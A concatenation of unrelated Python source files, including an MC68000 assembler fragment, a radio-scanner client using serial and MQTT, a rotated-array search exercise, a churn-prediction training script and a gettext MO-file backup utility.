found, index = instr.unbound_match(ABSOLUTE_L, start=start_index)
if found and '(xxx).L' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index][:-2],
size=4,
bits_size=32,
offset=2+offset)
return index, 7, 1, pack_be32u(value)
# (xxx).l ALIAS [2] addr (better to use 32bit when not specified)
found, index = instr.unbound_match(ABSOLUTE, start=start_index)
if found and '(xxx).L' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index],
size=4,
bits_size=32,
offset=2+offset)
return index, 7, 1, pack_be32u(value)
raise InvalidMode(instr)
def _build_opcode(self, base, *args):
return pack_bits_be16u(base, *args)
def _packer(self, token, op_size, offset):
value = self.parse_integer_or_label(
token, size=op_size + (op_size % 2), bits_size=op_size*8, offset=2+offset)
packers = {1: pack_be16u, 2: pack_be16u, 4: pack_be32u}
return packers[op_size](value)
@opcode('move', 'move.w', 'move.b', 'move.l')
def _move(self, instr):
op_size, s = _s_dark(instr.tokens[0])
next_index, src_m, src_xn, src_data = self._mode(instr, 1, 0, op_size)
# convert to MOVEA
if op_size in (2, 4) and instr.match(A_REGS, start=next_index):
return self._build_opcode(0b0000000001000000, ((13, 12), s), ((11, 9), _reg(instr.tokens[next_index])), ((5, 3), src_m), ((2, 0), src_xn)) + src_data
_, dst_m, dst_xn, dst_data = self._mode(
instr, next_index, len(src_data), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000000000000000, ((13, 12), s), ((11, 9), dst_xn), ((8, 6), dst_m), ((5, 3), src_m), ((2, 0), src_xn)) + src_data + dst_data
@opcode('movea', 'movea.w', 'movea.l')
def _movea(self, instr):
op_size, s = _s_dark(instr.tokens[0])
next_index, src_m, src_xn, src_data = self._mode(instr, 1, 0, op_size)
if instr.match(A_REGS, start=next_index):
return self._build_opcode(0b0000000001000000, ((13, 12), s), ((11, 9), _reg(instr.tokens[next_index])), ((5, 3), src_m), ((2, 0), src_xn)) + src_data
@opcode('ori', 'ori.w', 'ori.b', 'ori.l')
def _ori(self, instr):
if instr.match(IMMEDIATE, 'CCR'):
packed = self._packer(instr.tokens[1][1:], 1, 0)
return self._build_opcode(0b0000000000111100) + packed
if instr.match(IMMEDIATE, 'SR'):
packed = self._packer(instr.tokens[1][1:], 2, 0)
return self._build_opcode(0b0000000001111100) + packed
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000000000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('andi', 'andi.w', 'andi.b', 'andi.l')
def _andi(self, instr):
if instr.match(IMMEDIATE, 'CCR'):
packed = self._packer(instr.tokens[1][1:], 1, 0)
return self._build_opcode(0b0000001000111100) + packed
if instr.match(IMMEDIATE, 'SR'):
packed = self._packer(instr.tokens[1][1:], 2, 0)
return self._build_opcode(0b0000001001111100) + packed
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000001000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('subi', 'subi.w', 'subi.b', 'subi.l')
def _subi(self, instr):
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000010000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('addi', 'addi.w', 'addi.b', 'addi.l')
def _addi(self, instr):
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000011000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('eori', 'eori.w', 'eori.b', 'eori.l')
def _eori(self, instr):
if instr.match(IMMEDIATE, 'CCR'):
packed = self._packer(instr.tokens[1][1:], 1, 0)
return self._build_opcode(0b0000101000111100) + packed
if instr.match(IMMEDIATE, 'SR'):
packed = self._packer(instr.tokens[1][1:], 2, 0)
return self._build_opcode(0b0000101001111100) + packed
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000101000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('cmpi', 'cmpi.w', 'cmpi.b', 'cmpi.l')
def _cmpi(self, instr):
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000110000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('jmp')
def _jmp(self, instr):
_, src_m, src_xn, src_data = self._mode(
instr, 1, 0, 0, blacklist=('Dn', 'An', '(An)+', '-(An)', '#<data>'))
return self._build_opcode(0b0100111011000000, ((5, 3), src_m), ((2, 0), src_xn)) + src_data
@opcode('lea', 'lea.l')
def _lea(self, instr):
next_index, src_m, src_xn, src_data = self._mode(
instr, 1, 0, 4, blacklist=('Dn', 'An', '(An)+', '-(An)', '#<data>'))
if instr.match(A_REGS, start=next_index):
return self._build_opcode(0b0100000111000000, ((11, 9), _reg(instr.tokens[next_index])), ((5, 3), src_m), ((2, 0), src_xn)) + src_data
@opcode('bhi', 'bls', 'bcc', 'bcs', 'bne', 'beq', 'bvc', 'bvs', 'bpl', 'bmi', 'bge', 'blt', 'bgt', 'ble',
'bhi.b', 'bls.b', 'bcc.b', 'bcs.b', 'bne.b', 'beq.b', 'bvc.b', 'bvs.b', 'bpl.b', 'bmi.b', 'bge.b', 'blt.b', 'bgt.b', 'ble.b',
'bhi.w', 'bls.w', 'bcc.w', 'bcs.w', 'bne.w', 'beq.w', 'bvc.w', 'bvs.w', 'bpl.w', 'bmi.w', 'bge.w', 'blt.w', 'bgt.w', 'ble.w'
)
def _bcc(self, instr):
if instr.match(DISPLACEMENT):
condition = _cond(instr.tokens[0][1:])
op_size, _ = _s_dark(instr.tokens[0])
if op_size == 1:
value = self.parse_integer_or_label(instr.tokens[1],
size=2,
bits_size=8,
bits=(7, 0),
alignment=2, # here is safe to check for alignment
relative=self.pc+2)
return self._build_opcode(0b0110000000000000, ((11, 8), condition), ((7, 0), value))
elif op_size == 2:
value = self.parse_integer_or_label(instr.tokens[1],
size=2,
bits_size=16,
alignment=2, # here is safe to check for alignment
offset=2,
relative=self.pc+2)
return self._build_opcode(0b0110000000000000, ((11, 8), condition)) + pack_be16u(value)
@opcode('dbt', 'dbf', 'dbra', 'dbhi', 'dbls', 'dbcc', 'dbcs', 'dbne', 'dbeq', 'dbvc', 'dbvs', 'dbpl', 'dbmi', 'dbge', 'dblt', 'dbgt', 'dble',
'dbt.w', 'dbf.w', 'dbra.w', 'dbhi.w', 'dbls.w', 'dbcc.w', 'dbcs.w', 'dbne.w', 'dbeq.w', 'dbvc.w', 'dbvs.w', 'dbpl.w', 'dbmi.w', 'dbge.w', 'dblt.w', 'dbgt.w', 'dble.w'
)
def _dbcc(self, instr):
if instr.match(D_REGS, DISPLACEMENT):
condition = _cond(instr.tokens[0][2:])
d_reg = _reg(instr.tokens[1])
value = self.parse_integer_or_label(instr.tokens[2],
size=2,
bits_size=16,
alignment=2, # here is safe to check for alignment
offset=2,
relative=self.pc+2)
return self._build_opcode(0b0101000011001000, ((11, 8), condition), ((2, 0), d_reg)) + pack_be16u(value)
@opcode('jsr')
def _jsr(self, instr):
_, src_m, src_xn, src_data = self._mode(
instr, 1, 0, 0, blacklist=('Dn', 'An', '(An)+', '-(An)', '#<data>'))
return self._build_opcode(0b0100111010000000, ((5, 3), src_m), ((2, 0), src_xn)) + src_data
if __name__ == '__main__':
AssemblerMC68000.main()
|
StarcoderdataPython
|
8189563
|
"""millilauncher - A minimalist, line-oriented Minecraft launcher"""
__author__ = '<NAME> <<EMAIL>>'
|
StarcoderdataPython
|
9688807
|
<reponame>VishalKandala/Cantera-1.7
import string
import os
from constants import *
from SurfacePhase import SurfacePhase, EdgePhase
from Kinetics import Kinetics
import XML
__revision__ = "$Id: Interface.py,v 1.7 2006/05/03 19:46:28 dggoodwin Exp $"
class Interface(SurfacePhase, Kinetics):
"""
Two-dimensional interfaces.
Instances of class Interface represent reacting 2D interfaces
between bulk 3D phases. Class Interface defines no methods of its
own. All of its methods derive from either SurfacePhase or Kinetics.
Function importInterface should usually be used to build an
Interface object from a CTI file definition, rather than calling
the Interface constructor directly.
See: SurfacePhase, Kinetics, importInterface
"""
def __init__(self, src="", root=None, phases=[]):
"""
src - CTML or CTI input file name. If more than one phase is
defined in the file, src should be specified as 'filename\#id'
If the file is not CTML, it will be run through the CTI -> CTML
preprocessor first.
root - If a CTML tree has already been read in that contains
the definition of this interface, the root of this tree can be
specified instead of specifying 'src'.
phases - A list of all objects representing the neighboring phases
which participate in the reaction mechanism.
"""
self.ckin = 0
self._owner = 0
self.verbose = 1
# src has the form '<filename>#<id>'
fn = src.split('#')
id = ""
if len(fn) > 1:
id = fn[1]
fn = fn[0]
# read in the root element of the tree if not building from
# an already-built XML tree. Enable preprocessing if the film
# is a .cti file instead of XML.
if src and not root:
root = XML.XML_Node(name = 'doc', src = fn, preprocess = 1)
# If an 'id' tag was specified, find the node in the tree with
# that tag
if id:
s = root.child(id = id)
# otherwise, find the first element with tag name 'phase'
# (both 2D and 3D phases use the CTML tag name 'phase'
else:
s = root.child(name = "phase")
# build the surface phase
SurfacePhase.__init__(self, xml_phase=s)
# build the reaction mechanism. This object (representing the
# surface phase) is added to the end of the list of phases
Kinetics.__init__(self, xml_phase=s, phases=phases+[self])
def __del__(self):
"""Delete the Interface instance."""
Kinetics.__del__(self)
SurfacePhase.__del__(self)
|
StarcoderdataPython
|
3590617
|
<reponame>zen4prof/FreeCodeCamp_Data_Analysis_with_Python-main
import numpy as np
def calculate(numbers):
if len(numbers) != 9:
raise ValueError("List must contain nine numbers.")
data = np.reshape(np.array(numbers),(3,3))
calculations = {}
calculations['mean'] = [np.mean(data, axis=0).tolist(), np.mean(data, axis=1).tolist(), np.mean(data.flatten()).tolist()]
calculations['variance'] = [np.var(data, axis=0).tolist(), np.var(data, axis=1).tolist(), np.var(data.flatten()).tolist()]
calculations['standard deviation'] = [np.std(data, axis=0).tolist(), np.std(data, axis=1).tolist(), np.std(data.flatten()).tolist()]
calculations['max'] = [np.max(data, axis=0).tolist(), np.max(data, axis=1).tolist(), np.max(data.flatten()).tolist()]
calculations['min'] = [np.min(data, axis=0).tolist(), np.min(data, axis=1).tolist(), np.min(data.flatten()).tolist()]
calculations['sum'] = [np.sum(data, axis=0).tolist(), np.sum(data, axis=1).tolist(), np.sum(data.flatten()).tolist()]
return calculations
|
StarcoderdataPython
|
4989014
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:mod:`musk`
===========
.. module:: musk
:platform: Unix, Windows
:synopsis:
.. moduleauthor:: hbldh <<EMAIL>>
Created on 2015-11-06, 14:11
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from pkg_resources import resource_filename
import numpy as np
__all__ = ['MUSK1', 'MUSK2']
class _MUSK(object):
def __init__(self, id_):
self.name = None
data, self._names, self.info = _read_musk_data(id_)
self.data, self.labels, \
(self.molecule_names, self.conformation_names) = _parse_musk_data(data)
unique_bag_ids = np.unique(self.labels)
self.bag_labels = np.zeros((max(np.abs(unique_bag_ids)) + 1,), 'int')
self.bag_labels[np.abs(unique_bag_ids)] = np.sign(unique_bag_ids)
self.bag_labels = self.bag_labels[1:]
self.bag_partitioning = np.cumsum(np.bincount(np.abs(self.labels))[1:])[:-1]
def __str__(self):
return "{0} - {1} instances with {2} features. {3} Musks, {4} Non-musks".format(
self.name, self.data.shape[0], self.data.shape[1],
len(np.unique(self.labels[self.labels > 0])),
len(np.unique(self.labels[self.labels < 0])))
def __repr__(self):
return str(self)
def __unicode__(self):
return str(self)
class MUSK1(_MUSK):
def __init__(self):
super(MUSK1, self).__init__(1)
self.name = 'MUSK "Clean1" database'
class MUSK2(_MUSK):
def __init__(self):
super(MUSK2, self).__init__(2)
self.name = 'MUSK "Clean2" database'
def _read_musk_data(id_):
with open(resource_filename('skboost.datasets.musk',
'clean{0}.data'.format(id_)), mode='r') as f:
data = f.readlines()
with open(resource_filename('skboost.datasets.musk',
'clean{0}.names'.format(id_)), mode='r') as f:
names = f.readlines()
with open(resource_filename('skboost.datasets.musk',
'clean{0}.info'.format(id_)), mode='r') as f:
info = f.read()
return data, names, info
def _parse_musk_data(data):
molecule_names = []
conformation_names = []
f = []
labels = []
bag_id = 0
for row in data:
items = row.strip('\n').split(',')
if items[0] not in molecule_names:
molecule_names.append(items[0])
bag_id += 1
labels.append(int(bag_id * ((float(items[-1]) * 2) - 1)))
conformation_names.append(items[1])
f.append(list(map(float, items[2:-1])))
return np.array(f), np.array(labels), (molecule_names, conformation_names)
|
StarcoderdataPython
|
1966847
|
<filename>pi/bin/scan_client1.py
#!/usr/bin/python
################################################################################
#second version of the scanner client supporting P25
#
#TRUNK key sets to local P25 public safety
#DATA key shows IP address
#SRCH turns on NRSC5 decode
#MUTE does a shutdown
#
#receives output from modified op25 code via mqtt
#other side is
#mosquitto_sub -h localhost -t 'mqtt/p25'
#test with
#mosquitto_pub -h localhost -t 'mqtt/p25' -m "01/15/22 18:47:02.949287 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde"
#
#added this to crontab
#@reboot /usr/bin/screen -d -m -S fpclient /home/timc/bct8-upgrade/pi/bin/scan_client1.py
################################################################################
#pip install paho-mqtt
################################################################################
import socket, sys
import time
import os
import signal
import serial
import re
import subprocess
import shlex
#mqtt stuff
import paho.mqtt.client as mqttClient
Connected = False
broker = "localhost"
hd_audio_channel = -1
PID = 0
#open serial port
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
frequency = 146520000
current_state = 'idle'
start_time = time.time()
################################################################################
################################################################################
def read_loop():
global start_time
global current_state
#open serial port
state = 0
candidate_frequency = "00000000"
while True:
if ((time.time() > (start_time + 20)) & (current_state == 'idle')):
print("default trunk1 after 20s")
ser.write("!MRN\r\n")
current_state = "trunk1"
trunk1()
data = ser.readline()[:-2] # get rid of newline cr
if data:
print data
#check if a number -- if so this is a frequency
if re.match(r"[0-9]", data):
state = 1
print "number"
candidate_frequency+=str(data)
candidate_frequency = candidate_frequency[-7:]
mhz = candidate_frequency[:3]
ltmhz = candidate_frequency[-4:]
#print mhz + "." + ltmhz
print candidate_frequency
ser.write("#" + mhz + "." + ltmhz + "\r\n")
#this seems OK but arduino has problems with leading zero?
if (data == "E"):
# user says this is a frequency
frequency = int(candidate_frequency)
print "frequency is:"
print frequency
if frequency < 100000:
frequency = frequency * 1000
print "lt"
else:
frequency = frequency * 100
print "gt"
candidate_frequency = "00000000"
#udp call
udp_send("freq", frequency)
if (data == "M"):
#shutdown
time.sleep(1)
ser.write("OFF\r\n")
time.sleep(1)
os.system("/home/timc/stop-radio")
if (data == "M"):
ser.write("!HAM\r\n")
if (data == "k"):
ser.write("!MRN\r\n")
current_state = "trunk1"
trunk1()
if (data == "U"):
ser.write("146\r\n")
if (data == "D"):
ser.write("#146.520\r\n")
if (data == "r"):
nrsc5()
if (data == "d"):
#depends on route out but whatever
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
octets = s.getsockname()[0].split('.')
ser.write('@\r\n')
ser.write(octets[0].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write(octets[1].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write(octets[2].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write(octets[3].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write('@\r\n')
################################################################################
# main
################################################################################
def main():
setup()
mqtt_init()
read_loop()
################################################################################
# setup
################################################################################
def setup():
ser.write("@\r\n")
################################################################################
#mqtt init
################################################################################
def mqtt_init():
client = mqttClient.Client("Python")
client.on_message = on_message
client.on_connect = on_connect
client.connect(broker, port=1883)
client.loop_start()
while Connected != True:
print "not connected"
time.sleep(0.1)
print client.subscribe('mqtt/p25')
################################################################################
# nrsc5
# HD audio
# this doesn't die - need to do better with process crap
################################################################################
def nrsc5():
global hd_audio_channel
global PID
hd_audio_channel = hd_audio_channel + 1
if (hd_audio_channel == 3):
hd_audio_channel = 0
ch = str(hd_audio_channel)
ser.write("HD" + ch + "\r\n")
print "hda " + ch
if (PID):
os.kill(PID, signal.SIGTERM)
PID = subprocess.Popen(['/usr/local/bin/nrsc5', '88.7', ch])
################################################################################
# trunk1
# start the trunking process via shell script
################################################################################
def trunk1():
global PID
time.sleep(1)
ser.write("#152.7250\r\n")
time.sleep(1)
ser.write("!WX\r\n")
if (PID):
os.kill(PID, signal.SIGTERM)
PID = subprocess.Popen('/home/timc/op25.sh')
################################################################################
#mqtt stuff
#to test without traffic
#mosquitto_pub -h localhost -t 'mqtt/p25' -m "01/15/22 18:47:02.949287 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde"
################################################################################
def on_message(client, userdata, message):
#print "Message received: " + message.payload
#somewhere in here parse the strings from op25
#print type(message.payload)
#01/15/22 18:47:02.949287 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde
#01/15/22 18:47:03.313039 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde
#01/15/22 18:47:03.373206 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=15, src_addr=0x233fde
#01/15/22 18:47:04.207448 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x0059db
#characters = [chr(ascii) for ascii in message.payload] #convert ascii to char
#char_join = ''.join(characters)
#if this is the local sheriff
if re.match(r".+NAC 0x230", message.payload):
#print message.payload.split("=")
r = message.payload.split("=")
show_last_call(r[5][2:])
################################################################################
#show_last_call
#this should be a file someday
#1 - 49 County Sheriff's Office
#'2318c9': -- 27
#50 - 51 County Emergency Management
#70 - 79 Monticello Police Department
#'2333cd' -- 77 monticello
#80 - 89 New Glarus Police Department
#90 - 95 Brooklyn Police Department
#96 - 99 County Coroner's Office
#100 - 199 Brodhead Police Department
#200 - 299 Monroe Police Department
#300 - 324 County Sheriff's Office (Part-Time Employees)
#325 - 326 County Humane Society
#400 - 499 Albany Police Department
#720 - 729 Brodhead Fire Department
#740 - 749 Juda Community Fire Department
#750 - 759 Monroe Fire Department (Apparatus)
#800 - 899 County EMS Units
#6100 - 6199 Belleville Police Department
#7500 - 7599 Monroe Fire Department (Personnel)
# '326a41': 'BLN', -- blanchardville
#################################################################################
def show_last_call(radio_id):
radio_id = radio_id.strip()
dict = {
'000001': 'UNK',
'0059da': 'DSP',
'0059db': 'DSP',
'0059dc': 'DSP',
'0059d9': 'DSP',
'2318c7': 'S10',
'2318c9': 'S27',
'2318ca': 'S17',
'2318d1': 'S04',
'2318d2': 'S05',
'2318d9': 'S31',
'23ce06': 'NG2',
'23ce08': 'NG1',
'23cc14': 'NG4',
'23ce07': 'NG4',
'2333bd': 'MON',
'2333cc': 'MCL',
'2333cd': 'MCL',
'233fde': 'foo',
'326a41': 'BLN',
'16777215': 'ALB'
}
if dict.get(radio_id):
print "heard: " + radio_id + ": " + dict.get(radio_id)
ser.write(dict.get(radio_id) + "\r\n")
else:
print "unknown RID:" + radio_id + ":"
ser.write("UNK\r\n")
################################################################################
#mqtt on_connect
################################################################################
def on_connect(client, userdata, frlags, rc):
if rc == 0:
print("Connected to broker")
global Connected
Connected = True
else:
print("Connection failed")
################################################################################
# udp_send -- almost an exact topy of udpclient.py
################################################################################
def udp_send(mode, data):
#open network
print "programming:"
print data
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("localhost", 6020))
buf = ""
if mode == 'freq':
buf = buf + chr(0)
print "sending freq"
print data
print "--"
data = int(data)
i=0
while i < 4:
buf = buf + chr(data & 0xff)
data = data >> 8
i = i + 1
s.send(buf)
s.close()
return
################################################################################
# scanner class
################################################################################
class Scanner:
frequency = 146520000
def __init__(self, name):
self.name = name
################################################################################
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1861600
|
# Given an array of numbers which is sorted in ascending order and also rotated by some arbitrary number,
# find if a given ‘key’ is present in it.
# Write a function to return the index of the ‘key’ in the rotated array.
# If the ‘key’ is not present, return -1. You can assume that the given array does not have any duplicates.
# Example:
# Input: [10, 15, 1, 3, 8], key = 15
# Output: 1
# Explanation: '15' is present in the array at index '1'.
# O(logN) space:O(1)
def search_in_rotated_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_array([10, 15, 1, 3, 8], 15))
print(search_in_rotated_array([4, 5, 7, 9, 10, -1, 2], 10))
# follow up: How do we search in a sorted and rotated array that also has duplicates?
print(search_in_rotated_array([3, 7, 3, 3, 3], 7))
# best: O(logN) worst:O(N) space:O(1)
def search_in_rotated_duplicate_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] == arr[mid] and arr[end] == arr[mid]:
start += 1
end -= 1
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_duplicate_array([3, 7, 3, 3, 3], 7))
|
StarcoderdataPython
|
1935066
|
<gh_stars>1-10
"""
libraries
"""
# import shap
import joblib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pandas_profiling
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
import logging
import constants
logging.basicConfig(
level=logging.INFO,
filename="logs/churn_library.log",
format="%(asctime)-15s %(message)s",
)
logger = logging.getLogger()
def import_data(path):
"""
returns dataframe for the csv found at path
input:
path: a path to the csv
output:
df: pandas dataframe
"""
df = pd.read_csv(path)
return df.iloc[:, 2:]
def perform_eda(df, output_path):
"""
perform eda on df and save figures to images folder
input:
df: pandas dataframe
output_path: path to store the eda report
output:
None
"""
profile = pandas_profiling.ProfileReport(df)
profile.to_file(output_path)
def scaler(df, quant_columns):
"""
helper function to normalize each numerical column
input:
df: pandas dataframe
output:
df: normalized pandas dataframe
"""
df[quant_columns] = StandardScaler().fit_transform(df[quant_columns])
return df
def encoder(df, cat_columns):
"""
helper function to one-hot-encode each categorical column
input:
df: pandas dataframe
output:
df: one-hot-encoded pandas dataframe
"""
return pd.get_dummies(df, columns=cat_columns, drop_first=True)
def perform_train_test_split(df, target, test_size, random_state):
"""
input:
df: pandas dataframe
output:
X_train: X training data
X_test: X testing data
y_train: y training data
y_test: y testing data
target: target column
"""
X = df.drop(columns=[target])
y = df[target].ravel()
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=test_size, random_state=random_state, stratify=y
)
return X_train, X_test, y_train, y_test
def classification_report_image(
y_train, y_test, y_train_preds, y_test_preds, output_path
):
"""
produces classification report for training and testing results
input:
y_train: training response values
y_test: test response values
y_train_preds: training predictions
y_test_preds: test predictions
output_path: path to store the figure
output:
None
"""
plt.rc("figure", figsize=(7, 5))
plt.text(
0.01, 1.1, str("Train"), {"fontsize": 10}, fontproperties="monospace"
)
plt.text(
0.01,
0.7,
str(classification_report(y_train, y_train_preds)),
{"fontsize": 10},
fontproperties="monospace",
)
plt.text(
0.01, 0.5, str("Test"), {"fontsize": 10}, fontproperties="monospace"
)
plt.text(
0.01,
0.1,
str(classification_report(y_test, y_test_preds)),
{"fontsize": 10},
fontproperties="monospace",
)
plt.axis("off")
plt.savefig(output_path + "classification_report.png")
plt.close()
def feature_importance_plot(model, X, output_path):
"""
creates and stores the feature importances in output_path
input:
model: model object containing feature_importances_
X_data: pandas dataframe of X values
output_path: path to store the figure
output:
None
"""
importances = model.feature_importances_
indices = np.argsort(importances)[::-1]
names = [X.columns[i] for i in indices]
plt.figure(figsize=(20, 20))
plt.title("Feature Importance")
plt.ylabel("Importance")
plt.bar(range(X.shape[1]), importances[indices])
plt.xticks(range(X.shape[1]), names, rotation=60)
plt.savefig(output_path + "feature_importance.png")
plt.close()
def train_models(
X_train, X_test, y_train, y_test, image_output_path, model_output_path
):
"""
train, store model results: images + scores, and store models
input:
X_train: X training data
X_test: X testing data
y_train: y training data
y_test: y testing data
image_output_path: path to store the figures
model_output_path: path to store the models
output:
best_model
"""
rfc = RandomForestClassifier(random_state=42)
param_grid = {"n_estimators": [50, 100, 200], "max_depth": [2, 8, 16]}
cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)
cv_rfc.fit(X_train, y_train)
best_model = cv_rfc.best_estimator_
# creates and stores the feature importances
feature_importance_plot(best_model, X_test, image_output_path)
# produces classification report for training and testing results
y_train_preds = best_model.predict(X_train)
y_test_preds = best_model.predict(X_test)
classification_report_image(
y_train, y_test, y_train_preds, y_test_preds, image_output_path
)
# saves best model
joblib.dump(best_model, model_output_path)
if __name__ == "__main__":
logger.info("############################################################")
logger.info("import data")
df = import_data(constants.data_path)
logger.info(
f"inspect dataframe: \
\n{df.iloc[0]}"
)
logger.info(f"generate EDA report: {constants.eda_output_path}")
perform_eda(df, constants.eda_output_path)
logger.info(f"normalize numeric features: {constants.quant_columns}")
df = scaler(df, constants.quant_columns)
logger.info(
f"inspect dataframe: \
\n{df.iloc[0]}"
)
logger.info(f"one-hot-encode categorical features:{constants.cat_columns}")
df = encoder(df, constants.cat_columns)
logger.info(
f"inspect dataframe: \
\n{df.iloc[0]}"
)
logger.info(
f"perform train test split with the test size of {constants.test_size}"
)
X_train, X_test, y_train, y_test = perform_train_test_split(
df, constants.target, constants.test_size, constants.random_state
)
logger.info("start training")
train_models(
X_train,
X_test,
y_train,
y_test,
constants.image_output_path,
constants.model_output_path,
)
logger.info(
f"save models in {constants.model_output_path}, "
+ f"store results in {constants.image_output_path}"
)
|
StarcoderdataPython
|
32055
|
<reponame>kthy/wren
# -*- coding: utf-8 -*-
"""Gettext manipulation methods."""
from os import remove
from os.path import exists
from pathlib import Path
from shutil import copyfile, copystat
from typing import Sequence
from filehash import FileHash
from polib import MOFile, POFile, mofile
from wren.change import Change
def apply_changes(mo_file: MOFile, changelist: Sequence[Change]) -> None:
"""Apply all changes in the provided list of changes to the given MOFile."""
for change in changelist:
change.apply(mo_file)
def backup_original_mo(wowsdir: str, locale: str) -> None:
"""Copy the original `global.mo` to `global.mo.original`."""
global_mo_path = _global_mo_path(wowsdir, locale)
backup_mo_path = _backup_mo_path(wowsdir, locale)
_copyfile_and_checksum(global_mo_path, backup_mo_path)
def convert_mo_to_po(wowsdir: str, locale: str, outputdir: str) -> POFile:
"""Save the MO file for the given locale in PO format."""
mofile_path = Path(_global_mo_path(wowsdir, locale))
if not exists(mofile_path):
raise OSError(f"MO file for locale {locale} not found")
mof = mofile(mofile_path)
mof.save_as_pofile(f"{outputdir}/{mofile_path.stem}_{locale}.po")
def get_mo(wowsdir: str, locale: str) -> MOFile:
"""Open and return the global MO file in the given directory."""
return mofile(_global_mo_path(wowsdir, locale))
def restore_original_mo(wowsdir: str, locale: str) -> None:
"""Reinstate the original `global.mo` from `global.mo.original`."""
global_mo_path = _global_mo_path(wowsdir, locale)
backup_mo_path = _backup_mo_path(wowsdir, locale)
if exists(backup_mo_path):
_copyfile_and_checksum(backup_mo_path, global_mo_path)
remove(backup_mo_path)
def _copyfile_and_checksum(from_path, to_path) -> None:
"""Copy a file from from_path to to_path.
Raises OSError if the new file's checksum doesn't match the original."""
copyfile(from_path, to_path)
copystat(from_path, to_path)
hasher = FileHash("md5")
if hasher.hash_file(from_path) != hasher.hash_file(to_path):
raise OSError("Copy failed, hash mismatch detected")
def _backup_mo_path(wowsdir: str, locale: str) -> str:
return f"{_global_mo_path(wowsdir, locale)}.original"
def _global_mo_path(wowsdir: str, locale: str) -> str:
return f"{wowsdir}/res/texts/{locale}/LC_MESSAGES/global.mo"
|
